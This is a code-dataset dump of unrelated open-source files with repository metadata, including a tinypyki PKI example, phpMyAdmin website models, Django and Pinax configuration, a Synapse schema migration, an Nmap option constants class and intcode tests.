2018-05-29T22:50:33.000Z
|
2018-05-29T22:50:33.000Z
|
examples/mass-generation.py
|
Orange-OpenSource/tinypyki
|
10c57fb3a4413f4c601baaf58e53d92fd4a09f49
|
[
"BSD-3-Clause"
] | null | null | null |
examples/mass-generation.py
|
Orange-OpenSource/tinypyki
|
10c57fb3a4413f4c601baaf58e53d92fd4a09f49
|
[
"BSD-3-Clause"
] | 2
|
2016-11-01T11:45:28.000Z
|
2021-06-22T10:18:46.000Z
|
#!/usr/bin/env python
"""A third example to get started with tinypyki.
Toying with mass certificate generation.
"""
import os
import tinypyki as tiny
print("Creating a pki instance named \"mass-pki\"")
pki = tiny.PKI("mass-pki")
print("Create the \"root-ca\"")
root_ca = tiny.Node(nid = "root-ca", pathlen = 1, san="email=dev.null@hexample.com")
print("Create 10 sub nodes")
targets = [tiny.Node(nid = "target-{0}".format(i), issuer = "root-ca", ntype="u", san="ip=192.168.0.{0}, dns=hexample.com".format((175+i)%256)) for i in range(10)]
print("Insert the root-ca then all nodes in the pki")
tiny.do.insert(root_ca, pki)
for node in targets:
tiny.change.subj(node, cn=node.nid + "-dummy-hexample")
tiny.do.insert(node, pki)
print("Create everything, including p12 bundles")
tiny.do.everything(pki, pkcs12 = True)
print("Observe the pki changes")
tiny.show(pki)
# Uncomment this if you wish to see the contents of all the files
# print("Showing the contents of all files")
# for node in pki.nodes.values():
# tiny.show(node.key_path)
# tiny.show(node.csr_path)
# tiny.show(node.cert_path)
# tiny.show(node.crl_path)
print("Revoking every other certificate")
for node in pki.nodes.values():
if node.nid.startswith("target"):
if not int(node.nid.split("-")[-1])%2:
# Valid reasons: "unspecified", "keycompromise", "cacompromise", "affiliationchanged", "superseded", "cessationofoperation", "certificatehold", "removefromcrl"
tiny.do.revoke(node, reason="keycompromise")
print("Observe the crl changes of the root-ca")
tiny.show(pki.nodes["root-ca"].crl_path)
print("Create the verification environment")
tiny.do.verifyenv(pki, create=True)
print("Verify every file related to root-ca")
tiny.do.verify(pki.nodes["root-ca"])
# You can verify specific elements, by specifying "key", "csr", "cert", "crl" or "pkcs12"
# tiny.do.verify(pki.nodes["root-ca"], "key")
# You can verify the whole pki as follows
# tiny.do.verify_all(pki)
print("Destroy the verification environment")
tiny.do.verifyenv(pki, create=False)
# Uncomment this if you wish to delete the files
# print("Cleaning up the work direcotry")
# tiny.do.clean(pki)
| 32.820896
| 171
| 0.703502
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,404
| 0.638472
|
b1667d176dd7399e7e7f6c6217ae79f8d38f3cee
| 638
|
py
|
Python
|
passive_capture/reporter/admin.py
|
Sillson/passive_capture_py
|
167d08865400571c9eed60c0040cf67d27fa11b4
|
[
"MIT"
] | null | null | null |
passive_capture/reporter/admin.py
|
Sillson/passive_capture_py
|
167d08865400571c9eed60c0040cf67d27fa11b4
|
[
"MIT"
] | null | null | null |
passive_capture/reporter/admin.py
|
Sillson/passive_capture_py
|
167d08865400571c9eed60c0040cf67d27fa11b4
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.gis import admin as geo_model_admin
from leaflet.admin import LeafletGeoAdmin
from .models import Forecasts, Dam, Species
# Forecast Model
class ForecastsAdmin(admin.ModelAdmin):
list_display = ('dam', 'species', 'forecast_range')
admin.site.register(Forecasts, ForecastsAdmin)
# Species Model
class SpeciesAdmin(admin.ModelAdmin):
list_display = ('name', 'reference_name')
admin.site.register(Species, SpeciesAdmin)
# Dam Model - requires GeoAdmin privelages
class DamAdmin(LeafletGeoAdmin):
list_display = ('name', 'abbr', 'location')
admin.site.register(Dam, DamAdmin)
| 26.583333
| 55
| 0.782132
| 252
| 0.394984
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.230408
|
b166dad82fde9d6a3518b1f26a85b2e2546d77b9
| 16,633
|
py
|
Python
|
files/models.py
|
AdrianoCahete/website
|
114156e24b37e5f2293aeac3c29ab4d5cd8311cd
|
[
"MIT"
] | null | null | null |
files/models.py
|
AdrianoCahete/website
|
114156e24b37e5f2293aeac3c29ab4d5cd8311cd
|
[
"MIT"
] | null | null | null |
files/models.py
|
AdrianoCahete/website
|
114156e24b37e5f2293aeac3c29ab4d5cd8311cd
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
# vim: set expandtab sw=4 ts=4 sts=4:
#
# phpMyAdmin web site
#
# Copyright (C) 2008 - 2016 Michal Cihar <michal@cihar.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import json
import urllib2
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.core.urlresolvers import reverse
from django.db import models
from django.conf import settings
from django.utils import timezone
import os.path
from data.themes import CSSMAP
from markupfield.fields import MarkupField
from pmaweb.cdn import purge_cdn, purge_all_cdn
# Naming of versions
VERSION_INFO = (
('alpha1', ' First alpha version.'),
('alpha2', ' Second alpha version.'),
('alpha3', ' Third alpha version.'),
('alpha4', ' Fourth alpha version.'),
('beta1', ' First beta version.'),
('beta2', ' Second beta version.'),
('beta3', ' Third beta version.'),
('beta4', ' Fourth beta version.'),
('beta', ' Beta version.'),
('rc1', ' First release candidate.'),
('rc2', ' Second release candidate.'),
('rc3', ' Third release candidate.'),
('rc4', ' Fourth release candidate.'),
('rc', ' Release candidate.'),
)
DOCKER_TRIGGER = \
'https://registry.hub.docker.com/u/phpmyadmin/phpmyadmin/trigger/{0}/'
def get_current_releases():
delta = 1000000
result = []
for version in settings.LISTED_BRANCHES:
min_vernum = Release.parse_version(version)
max_vernum = min_vernum + delta
stable_releases = Release.objects.filter(
version_num__gte=min_vernum,
version_num__lt=max_vernum,
stable=True,
)
if stable_releases.exists():
result.append(stable_releases[0])
return result
class Release(models.Model):
version = models.CharField(max_length=50, unique=True)
version_num = models.IntegerField(default=0, unique=True)
release_notes = MarkupField(default_markup_type='markdown')
stable = models.BooleanField(default=False, db_index=True)
snapshot = models.BooleanField(default=False, db_index=True)
date = models.DateTimeField(db_index=True, default=timezone.now)
purged = False
class Meta(object):
ordering = ['-version_num']
def __unicode__(self):
return self.version
def get_absolute_url(self):
if self.snapshot:
return reverse('downloads')
return reverse('release', kwargs={'version': self.version})
def simpledownload(self):
try:
return self.download_set.get(
filename__endswith='-all-languages.zip'
)
except Download.DoesNotExist:
try:
return self.download_set.all()[0]
except IndexError:
return None
@staticmethod
def parse_version(version):
if '+' in version:
# Snapshots, eg. 4.7+snapshot
parts = [int(x) for x in version.split('+')[0].split('.')]
assert len(parts) == 2
return (
100000000 * parts[0] +
1000000 * parts[1]
)
if '-' in version:
version, suffix = version.split('-')
if suffix.startswith('alpha'):
suffix_num = int(suffix[5:])
elif suffix.startswith('beta'):
suffix_num = 10 + int(suffix[4:])
elif suffix.startswith('rc'):
suffix_num = 50 + int(suffix[2:])
else:
raise ValueError(version)
else:
suffix_num = 99
version = version
parts = [int(x) for x in version.split('.')]
if len(parts) == 2:
parts.append(0)
if len(parts) == 3:
parts.append(0)
assert len(parts) == 4
return (
100000000 * parts[0] +
1000000 * parts[1] +
10000 * parts[2] +
100 * parts[3] +
suffix_num
)
def save(self, *args, **kwargs):
self.version_num = self.parse_version(self.version)
self.stable = self.version_num % 100 == 99
super(Release, self).save(*args, **kwargs)
def get_version_suffix(self):
'''
Returns suffix for a version.
'''
for match, result in VERSION_INFO:
if self.version.find(match) != -1:
return result
return ''
def get_php_versions(self):
if self.version[:3] == '5.1':
return '>=7.1,<8.0'
elif self.version[:3] == '5.0':
return '>=7.1,<8.0'
elif self.version[:3] == '4.9':
return '>=5.5,<8.0'
elif self.version[:3] == '4.8':
return '>=5.5,<7.3'
elif self.version[:3] == '4.7':
return '>=5.5,<7.3'
elif self.version[:3] == '4.6':
return '>=5.5,<7.2'
elif self.version[:3] == '4.5':
return '>=5.5,<7.1'
elif self.version[:3] == '4.4':
return '>=5.3,<7.1'
elif self.version[:3] == '4.3':
return '>=5.3,<7.0'
elif self.version[:3] == '4.2':
return '>=5.3,<7.0'
elif self.version[:3] == '4.1':
return '>=5.3,<7.0'
elif self.version[:3] == '4.0':
return '>=5.2,<5.3'
def get_mysql_versions(self):
if self.version[:3] == '5.1':
return '>=5.5'
elif self.version[:3] == '5.0':
return '>=5.5'
elif self.version[:3] == '4.9':
return '>=5.5'
elif self.version[:3] == '4.8':
return '>=5.5'
elif self.version[:3] == '4.7':
return '>=5.5'
elif self.version[:3] == '4.6':
return '>=5.5'
elif self.version[:3] == '4.5':
return '>=5.5'
elif self.version[:3] == '4.4':
return '>=5.5'
elif self.version[:3] == '4.3':
return '>=5.5'
elif self.version[:3] == '4.2':
return '>=5.5'
elif self.version[:3] == '4.1':
return '>=5.5'
elif self.version[:3] == '4.0':
return '>=5.0'
def get_version_info(self):
'''
Returns description to the phpMyAdmin version.
'''
text = ''
if self.version[:2] == '0.':
text = 'Historical release.'
elif self.version[:2] == '1.':
text = 'Historical release.'
elif self.version[:2] == '2.':
text = 'Version compatible with PHP 4+ and MySQL 3+.'
elif self.version[:2] == '3.':
text = (
'Frames version not requiring Javascript. ' +
'Requires PHP 5.2 and MySQL 5. ' +
'Supported for security fixes only, until Jan 1, 2014.'
)
elif self.version[:3] == '5.1':
text = (
'Future version compatible with PHP 7.1 and newer and MySQL 5.5 and newer. '
)
elif self.version[:3] == '5.0':
text = (
'Current version compatible with PHP 7.1 and newer and MySQL 5.5 and newer. '
)
elif self.version[:3] == '4.9':
text = (
'Older version compatible with PHP 5.5 to 7.4 and MySQL 5.5 and newer. ' +
'Currently supported for security fixes only. '
)
elif self.version[:3] == '4.8':
text = (
'Older version compatible with PHP 5.5 to 7.2 and MySQL 5.5 and newer. ' +
'Was supported until June 4, 2019.'
)
elif self.version in ('4.7.0', '4.7.1', '4.7.2', '4.7.3', '4.7.0-rc1', '4.7.0-beta1'):
text = (
'Older version compatible with PHP 5.5 to 7.1 and MySQL 5.5 and newer. ' +
'Was supported until April 7, 2018.'
)
elif self.version[:3] == '4.7':
text = (
'Older version compatible with PHP 5.5 to 7.2 and MySQL 5.5 and newer. ' +
'Was supported until April 7, 2018.'
)
elif self.version[:3] == '4.6':
text = (
'Older version compatible with PHP 5.5 to 7.1 and MySQL 5.5 and newer. ' +
'Was supported until April 1, 2017.'
)
elif self.version[:3] == '4.5':
text = (
'Older version compatible with PHP 5.5 to 7.0 and MySQL 5.5. ' +
'Was supported until April 1, 2016.'
)
elif self.version[:3] == '4.4':
text = (
'Older version compatible with PHP 5.3.7 to 7.0 and MySQL 5.5. ' +
'Was supported until October 1, 2016.'
)
elif self.version[:3] == '4.3':
text = (
'Older version compatible with PHP 5.3 and MySQL 5.5. ' +
'Was supported until October 1, 2015.'
)
elif self.version[:3] == '4.2':
text = (
'Older version compatible with PHP 5.3 and MySQL 5.5. ' +
'Was supported until July 1, 2015.'
)
elif self.version[:3] == '4.1':
text = (
'Older version compatible with PHP 5.3 and MySQL 5.5. ' +
'Was supported until January 1, 2015.'
)
elif self.version[:3] == '4.0':
text = (
'Older version compatible with PHP 5.2 and MySQL 5. ' +
'Does not support PHP 5.5 or newer. ' +
'Was supported until April 1, 2017.'
)
text += self.get_version_suffix()
return text
def get_downloads(self):
"""Lists downloads, making all-languages.zip first"""
dlset = self.download_set
return (
list(dlset.filter(filename__endswith='all-languages.zip')) +
list(dlset.exclude(filename__endswith='all-languages.zip'))
)
class Download(models.Model):
release = models.ForeignKey(Release)
filename = models.CharField(max_length=50)
size = models.IntegerField(default=0)
sha1 = models.CharField(max_length=40)
sha256 = models.CharField(max_length=64)
signed = models.BooleanField(default=False)
class Meta(object):
ordering = ['-release__version_num', 'filename']
unique_together = ['release', 'filename']
def __unicode__(self):
if self.release.snapshot:
return '/snapshots/{0}'.format(
self.filename
)
return '/phpMyAdmin/{0}/{1}'.format(
self.release.version,
self.filename
)
@property
def size_k(self):
return self.size / 1024
@property
def size_m(self):
return self.size / (1024 * 1024)
def get_filesystem_path(self):
return os.path.join(
settings.FILES_PATH,
'phpMyAdmin',
self.release.version,
self.filename
)
def get_absolute_url(self):
return 'https://files.phpmyadmin.net{0}'.format(
self.__unicode__()
)
def get_signed_url(self):
if not self.signed:
return ''
return 'https://files.phpmyadmin.net{0}.asc'.format(
self.__unicode__()
)
def get_checksum_url(self):
return 'https://files.phpmyadmin.net{0}.sha256'.format(
self.__unicode__()
)
def get_alternate_url(self):
return 'https://1126968067.rsc.cdn77.org{0}'.format(
self.__unicode__()
)
@property
def archive(self):
return self.filename.rsplit('.', 1)[-1]
@property
def composer_type(self):
ext = self.filename.rsplit('.', 1)[-1]
if ext == 'zip':
return 'zip'
else:
return 'tar'
@property
def get_stable_url(self):
filename, ext = self.filename.rsplit('.', 1)
if ext not in ('zip', '7z'):
filename, ext2 = filename.rsplit('.', 1)
ext = '{0}.{1}'.format(ext2, ext)
variant = filename.split('-', 2)[2]
return reverse(
'latest-download',
kwargs={
'flavor': variant,
'extension': '.' + ext,
}
)
@property
def get_stable_filename(self):
return self.get_stable_url.rsplit('/', 1)[1]
@property
def is_featured(self):
return self.filename.endswith('all-languages.zip')
class Theme(models.Model):
name = models.CharField(max_length=50)
display_name = models.CharField(max_length=50)
version = models.CharField(max_length=50)
filename = models.CharField(max_length=100, unique=True)
supported_versions = models.CharField(max_length=50)
description = models.TextField()
author = models.CharField(max_length=200)
url = models.URLField(blank=True)
size = models.IntegerField(default=0)
sha1 = models.CharField(max_length=40)
sha256 = models.CharField(max_length=64)
signed = models.BooleanField(default=False)
date = models.DateTimeField(db_index=True, default=timezone.now)
show = models.BooleanField(default=True)
class Meta(object):
ordering = ['name', 'version']
def __unicode__(self):
return u'{0} {1}'.format(self.display_name, self.version)
@property
def imgname(self):
return 'images/themes/{0}.png'.format(self.name)
def get_absolute_url(self):
return 'https://files.phpmyadmin.net/themes/{0}/{1}/{2}'.format(
self.name,
self.version,
self.filename,
)
def get_signed_url(self):
if not self.signed:
return ''
return 'https://files.phpmyadmin.net/themes/{0}/{1}/{2}.asc'.format(
self.name,
self.version,
self.filename,
)
def get_filesystem_path(self):
return os.path.join(
settings.FILES_PATH,
'themes',
self.name,
self.version,
self.filename
)
@property
def get_css(self):
return CSSMAP[self.supported_versions]
def dockerhub_trigger(tag):
if settings.DOCKERHUB_TOKEN is None:
return
request = urllib2.Request(
DOCKER_TRIGGER.format(settings.DOCKERHUB_TOKEN),
json.dumps({'docker_tag': tag}),
{'Content-Type': 'application/json'}
)
handle = urllib2.urlopen(request)
handle.read()
@receiver(post_save, sender=Release)
def purge_release(sender, instance, **kwargs):
if instance.purged:
return
instance.purged = True
purge_cdn(
# Pages with _littleboxes.html
reverse('home'),
reverse('news'),
# Download lists
reverse('files'),
reverse('feed-files'),
reverse('downloads'),
# Version dumps
'/downloads/list.txt',
'/home_page/version.txt',
'/home_page/version.js',
'/home_page/version.json',
'/downloads/phpMyAdmin-latest-all-languages.tar.bz2',
'/downloads/phpMyAdmin-latest-all-languages.tar.gz',
'/downloads/phpMyAdmin-latest-all-languages.tar.xz',
'/downloads/phpMyAdmin-latest-all-languages.zip',
'/downloads/phpMyAdmin-latest-english.tar.bz2',
'/downloads/phpMyAdmin-latest-english.tar.gz',
'/downloads/phpMyAdmin-latest-english.tar.xz',
'/downloads/phpMyAdmin-latest-english.zip',
'/downloads/phpMyAdmin-latest-source.tar.xz',
reverse('doap'),
reverse('pad'),
# This release
instance.get_absolute_url(),
)
# Purge all pages as every page contains download link
purge_all_cdn()
@receiver(post_save, sender=Download)
def purge_download(sender, instance, **kwargs):
purge_release(sender, instance.release)
@receiver(post_save, sender=Theme)
def purge_theme(sender, instance, **kwargs):
purge_cdn(reverse('themes'))
| 32.486328
| 94
| 0.554199
| 12,409
| 0.746047
| 0
| 0
| 3,852
| 0.231588
| 0
| 0
| 4,969
| 0.298743
|
b166eaf0f74796997babad39184ea07ba1f3c842
| 948
|
py
|
Python
|
main/models/sign.py
|
fakegit/gxgk-wechat-server
|
89ad21bcd2dcd1c28e43d4b230d47207e78098b3
|
[
"MIT"
] | 1,564
|
2015-09-01T13:11:02.000Z
|
2022-03-29T08:44:56.000Z
|
main/models/sign.py
|
fakegit/gxgk-wechat-server
|
89ad21bcd2dcd1c28e43d4b230d47207e78098b3
|
[
"MIT"
] | 11
|
2015-12-13T05:04:15.000Z
|
2019-09-10T06:14:03.000Z
|
main/models/sign.py
|
fakegit/gxgk-wechat-server
|
89ad21bcd2dcd1c28e43d4b230d47207e78098b3
|
[
"MIT"
] | 649
|
2015-12-11T09:23:09.000Z
|
2022-03-04T17:31:28.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from . import db
class Sign(db.Model):
__table_args__ = {
'mysql_engine': 'InnoDB',
'mysql_charset': 'utf8mb4'
}
openid = db.Column(db.String(32), primary_key=True, unique=True,
nullable=False)
lastsigntime = db.Column(db.BigInteger, default=0, nullable=False)
totaldays = db.Column(db.SmallInteger, default=0, nullable=False)
keepdays = db.Column(db.SmallInteger, default=0, nullable=False)
def __init__(self, openid, lastsigntime, totaldays, keepdays):
self.openid = openid
self.lastsigntime = lastsigntime
self.totaldays = totaldays
self.keepdays = keepdays
def __repr__(self):
return '<openid %r>' % self.openid
def save(self):
db.session.add(self)
db.session.commit()
return self
def update(self):
db.session.commit()
return self
| 26.333333
| 70
| 0.619198
| 881
| 0.929325
| 0
| 0
| 0
| 0
| 0
| 0
| 103
| 0.10865
|
b167bd125d417e4efdcc02611c67219208d449ac
| 2,579
|
py
|
Python
|
pinax/projects/sample_group_project/urls.py
|
peiwei/pinax
|
34f95b1df4318655fe9bd90dcda8fe824e0c4117
|
[
"MIT"
] | 1
|
2019-02-12T04:45:09.000Z
|
2019-02-12T04:45:09.000Z
|
pinax/projects/sample_group_project/urls.py
|
peiwei/pinax
|
34f95b1df4318655fe9bd90dcda8fe824e0c4117
|
[
"MIT"
] | null | null | null |
pinax/projects/sample_group_project/urls.py
|
peiwei/pinax
|
34f95b1df4318655fe9bd90dcda8fe824e0c4117
|
[
"MIT"
] | 1
|
2019-02-12T04:45:40.000Z
|
2019-02-12T04:45:40.000Z
|
from django.conf import settings
from django.conf.urls.defaults import *
from django.views.generic.simple import direct_to_template
from django.contrib import admin
admin.autodiscover()
from account.openid_consumer import PinaxConsumer
handler500 = "pinax.views.server_error"
if settings.ACCOUNT_OPEN_SIGNUP:
signup_view = "account.views.signup"
else:
signup_view = "signup_codes.views.signup"
urlpatterns = patterns("",
url(r"^$", direct_to_template, {
"template": "homepage.html",
}, name="home"),
url(r"^admin/invite_user/$", "signup_codes.views.admin_invite_user", name="admin_invite_user"),
url(r"^account/signup/$", signup_view, name="acct_signup"),
(r"^about/", include("about.urls")),
(r"^account/", include("account.urls")),
(r"^openid/(.*)", PinaxConsumer()),
(r"^profiles/", include("basic_profiles.urls")),
(r"^notices/", include("notification.urls")),
(r"^announcements/", include("announcements.urls")),
(r"^tagging_utils/", include("tagging_utils.urls")),
(r"^comments/", include("threadedcomments.urls")),
(r"^attachments/", include("attachments.urls")),
(r"^groups/", include("basic_groups.urls")),
(r"^tribes/", include("tribes.urls")),
(r"^projects/", include("projects.urls")),
(r"^flag/", include("flag.urls")),
(r"^admin/", include(admin.site.urls)),
)
from tagging.models import TaggedItem
from projects.models import Project
from tasks.models import Task
from topics.models import Topic
from wiki.models import Article as WikiArticle
tagged_models = (
dict(title="Projects",
query=lambda tag: TaggedItem.objects.get_by_model(Project, tag),
),
dict(title="Topics",
query=lambda tag: TaggedItem.objects.get_by_model(Topic, tag),
),
dict(title="Project Tasks",
query=lambda tag: TaggedItem.objects.get_by_model(Task, tag),
),
dict(title="Wiki Articles",
query=lambda tag: TaggedItem.objects.get_by_model(WikiArticle, tag),
),
)
tagging_ext_kwargs = {
'tagged_models':tagged_models,
}
urlpatterns += patterns('',
url(r'^tags/(?P<tag>.+)/(?P<model>.+)$', 'tagging_ext.views.tag_by_model',
kwargs=tagging_ext_kwargs, name='tagging_ext_tag_by_model'),
url(r'^tags/(?P<tag>.+)/$', 'tagging_ext.views.tag',
kwargs=tagging_ext_kwargs, name='tagging_ext_tag'),
url(r'^tags/$', 'tagging_ext.views.index', name='tagging_ext_index'),
)
if settings.SERVE_MEDIA:
urlpatterns += patterns("",
(r"", include("staticfiles.urls")),
)
| 29.306818
| 99
| 0.669252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 909
| 0.352462
|
b1684a8441dca67ce07724eebd55d0e4be2809be
| 3,060
|
py
|
Python
|
synapse/storage/schema/delta/50/make_event_content_nullable.py
|
Cadair/synapse
|
466866a1d9dd1fcf82348a36c0532cb0c6614767
|
[
"Apache-2.0"
] | 2
|
2020-04-30T18:38:02.000Z
|
2020-07-08T21:38:28.000Z
|
synapse/storage/schema/delta/50/make_event_content_nullable.py
|
Cadair/synapse
|
466866a1d9dd1fcf82348a36c0532cb0c6614767
|
[
"Apache-2.0"
] | 4
|
2020-03-04T23:47:05.000Z
|
2021-12-09T21:41:44.000Z
|
synapse/storage/schema/delta/50/make_event_content_nullable.py
|
Cadair/synapse
|
466866a1d9dd1fcf82348a36c0532cb0c6614767
|
[
"Apache-2.0"
] | 2
|
2020-03-03T18:34:52.000Z
|
2022-03-31T11:06:18.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
We want to stop populating 'event.content', so we need to make it nullable.
If this has to be rolled back, then the following should populate the missing data:
Postgres:
UPDATE events SET content=(ej.json::json)->'content' FROM event_json ej
WHERE ej.event_id = events.event_id AND
stream_ordering < (
SELECT stream_ordering FROM events WHERE content IS NOT NULL
ORDER BY stream_ordering LIMIT 1
);
UPDATE events SET content=(ej.json::json)->'content' FROM event_json ej
WHERE ej.event_id = events.event_id AND
stream_ordering > (
SELECT stream_ordering FROM events WHERE content IS NOT NULL
ORDER BY stream_ordering DESC LIMIT 1
);
SQLite:
UPDATE events SET content=(
SELECT json_extract(json,'$.content') FROM event_json ej
WHERE ej.event_id = events.event_id
)
WHERE
stream_ordering < (
SELECT stream_ordering FROM events WHERE content IS NOT NULL
ORDER BY stream_ordering LIMIT 1
)
OR stream_ordering > (
SELECT stream_ordering FROM events WHERE content IS NOT NULL
ORDER BY stream_ordering DESC LIMIT 1
);
"""
import logging
from synapse.storage.engines import PostgresEngine
logger = logging.getLogger(__name__)
def run_create(cur, database_engine, *args, **kwargs):
pass
def run_upgrade(cur, database_engine, *args, **kwargs):
if isinstance(database_engine, PostgresEngine):
cur.execute(
"""
ALTER TABLE events ALTER COLUMN content DROP NOT NULL;
"""
)
return
# sqlite is an arse about this. ref: https://www.sqlite.org/lang_altertable.html
cur.execute(
"SELECT sql FROM sqlite_master WHERE tbl_name='events' AND type='table'"
)
(oldsql,) = cur.fetchone()
sql = oldsql.replace("content TEXT NOT NULL", "content TEXT")
if sql == oldsql:
raise Exception("Couldn't find null constraint to drop in %s" % oldsql)
logger.info("Replacing definition of 'events' with: %s", sql)
cur.execute("PRAGMA schema_version")
(oldver,) = cur.fetchone()
cur.execute("PRAGMA writable_schema=ON")
cur.execute(
"UPDATE sqlite_master SET sql=? WHERE tbl_name='events' AND type='table'",
(sql,),
)
cur.execute("PRAGMA schema_version=%i" % (oldver + 1,))
cur.execute("PRAGMA writable_schema=OFF")
| 31.546392
| 84
| 0.671242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,353
| 0.768954
|
b169661dd2e123c3c4e9fd3e7fd531b5b79cc52c
| 1,822
|
py
|
Python
|
tools/applause_detection/applause_detection.py
|
AudiovisualMetadataPlatform/amp_mgms
|
593d4f4d40b597a7753cd152cd233976e6b28c75
|
[
"Apache-2.0"
] | null | null | null |
tools/applause_detection/applause_detection.py
|
AudiovisualMetadataPlatform/amp_mgms
|
593d4f4d40b597a7753cd152cd233976e6b28c75
|
[
"Apache-2.0"
] | 1
|
2022-02-16T16:21:03.000Z
|
2022-02-16T16:21:03.000Z
|
tools/applause_detection/applause_detection.py
|
AudiovisualMetadataPlatform/amp_mgms
|
593d4f4d40b597a7753cd152cd233976e6b28c75
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import os
import os.path
import shutil
import subprocess
import sys
import tempfile
import argparse
import amp.utils
def main():
#(root_dir, input_audio, min_segment_duration, amp_segments) = sys.argv[1:5]
parser = argparse.ArgumentParser()
parser.add_argument("input_audio")
parser.add_argument("min_segment_duration")
parser.add_argument("amp_segments")
args = parser.parse_args()
(input_audio, min_segment_duration, amp_segments) = (args.input_audio, args.min_segment_duration, args.amp_segments)
print("Current directory: " + os.getcwd())
print("Input audio: " + input_audio)
# use a tmp directory accessible to the singularity for input/output
with tempfile.TemporaryDirectory(dir = "/tmp") as tmpdir:
# copy the input audio file to the tmp directory
filename = os.path.basename(input_audio)
shutil.copy(input_audio, f"{tmpdir}/{filename}")
print("Temporary directory " + tmpdir + " after input file copied: " + str(os.listdir(tmpdir)))
# The applause_detection singularity file is assumed to be @ {mgm_sif}/applause_detection.sif
#sif = amp.utils.get_sif_dir(root_dir) + "/applause_detection.sif"
# the new build puts the sif next to the script.
sif = sys.path[0] + "/applause_detection.sif"
# run singularity
subprocess.run([sif, tmpdir, min_segment_duration], check=True)
# copy the corresponding temporary output file to the output AMP segments JSON
print("Temporary directory " + tmpdir + " after output file generated: " + str(os.listdir(tmpdir)))
shutil.copy(f"{tmpdir}/{filename}.json", amp_segments)
print("Output AMP Segment: " + amp_segments)
exit(0)
if __name__ == "__main__":
main()
| 36.44
| 120
| 0.687157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 817
| 0.448408
|
b16a393bb50e48e50f448e75e1aa34a864d369d1
| 226
|
py
|
Python
|
5_Pham_Ngo_Tien_Dung/3.1.py
|
lpython2006e/exercies
|
84343eae57d86708a7984aa02f77183a4688a508
|
[
"MIT"
] | null | null | null |
5_Pham_Ngo_Tien_Dung/3.1.py
|
lpython2006e/exercies
|
84343eae57d86708a7984aa02f77183a4688a508
|
[
"MIT"
] | null | null | null |
5_Pham_Ngo_Tien_Dung/3.1.py
|
lpython2006e/exercies
|
84343eae57d86708a7984aa02f77183a4688a508
|
[
"MIT"
] | 8
|
2020-07-10T14:13:54.000Z
|
2020-08-03T08:17:50.000Z
|
"""Write a program that allow user enter a file name (path) then content, allow user to save it"""
filename = input("Please input filename")
f= open(filename,"w+")
content = input("Please input content")
f.write(content)
| 37.666667
| 99
| 0.712389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.650442
|
b16bfa5767e1c86af8aeaefb5fff8896cc5aa5cc
| 1,523
|
py
|
Python
|
dxlnmapclient/constants.py
|
camilastock/opendxl-nmap-client-python
|
2221adcb154a412c14925935159afc67ed9ba7a5
|
[
"Apache-2.0"
] | null | null | null |
dxlnmapclient/constants.py
|
camilastock/opendxl-nmap-client-python
|
2221adcb154a412c14925935159afc67ed9ba7a5
|
[
"Apache-2.0"
] | null | null | null |
dxlnmapclient/constants.py
|
camilastock/opendxl-nmap-client-python
|
2221adcb154a412c14925935159afc67ed9ba7a5
|
[
"Apache-2.0"
] | 1
|
2018-02-12T18:20:18.000Z
|
2018-02-12T18:20:18.000Z
|
class DxlNmapOptions:
"""
Constants that are used to execute Nmap tool
+-------------+---------+----------------------------------------------------------+
| Option | Command | Description |
+=============+=========+==========================================================+
| Aggressive | -A | Aggressive Scan |
| Scan | | |
+-------------+---------+----------------------------------------------------------+
| Operating | -O | Operating system in the current host |
| System | | |
+-------------+---------+----------------------------------------------------------+
| Aggressive | -O - A | Both options |
| Scan | | |
| + | | |
| Operating | | |
| System | | |
+-------------+---------+----------------------------------------------------------+
"""
AGGRESSIVE_SCAN = "-A"
OPERATING_SYSTEM = "-O"
AGGRESSIVE_SCAN_OP_SYSTEM = "-O -A"
| 60.92
| 88
| 0.169402
| 1,522
| 0.999343
| 0
| 0
| 0
| 0
| 0
| 0
| 1,416
| 0.929744
|
b16c522c8657dbedfb8cc24e18349f5784c77002
| 8,203
|
py
|
Python
|
2019/intcode/intcode/tests/test_intcode.py
|
Ganon11/AdventCode
|
eebf3413c8e73c45d0e0a65a80e57eaf594baead
|
[
"MIT"
] | null | null | null |
2019/intcode/intcode/tests/test_intcode.py
|
Ganon11/AdventCode
|
eebf3413c8e73c45d0e0a65a80e57eaf594baead
|
[
"MIT"
] | null | null | null |
2019/intcode/intcode/tests/test_intcode.py
|
Ganon11/AdventCode
|
eebf3413c8e73c45d0e0a65a80e57eaf594baead
|
[
"MIT"
] | null | null | null |
import intcode
def test_default_constructor(): # pylint: disable=C0116
values = [0, 1, 2, 0, 99]
program = intcode.IntCodeProgram(values)
assert program.instruction_pointer == 0
assert program.memory == values
def test_noun_verb(): # pylint: disable=C0116
values = [0, 1, 2, 0, 99]
program = intcode.IntCodeProgram(values)
assert program.instruction_pointer == 0
assert program.memory == values
program.set_noun(7)
assert program.memory[1] == 7
program.set_verb(3)
assert program.memory[2] == 3
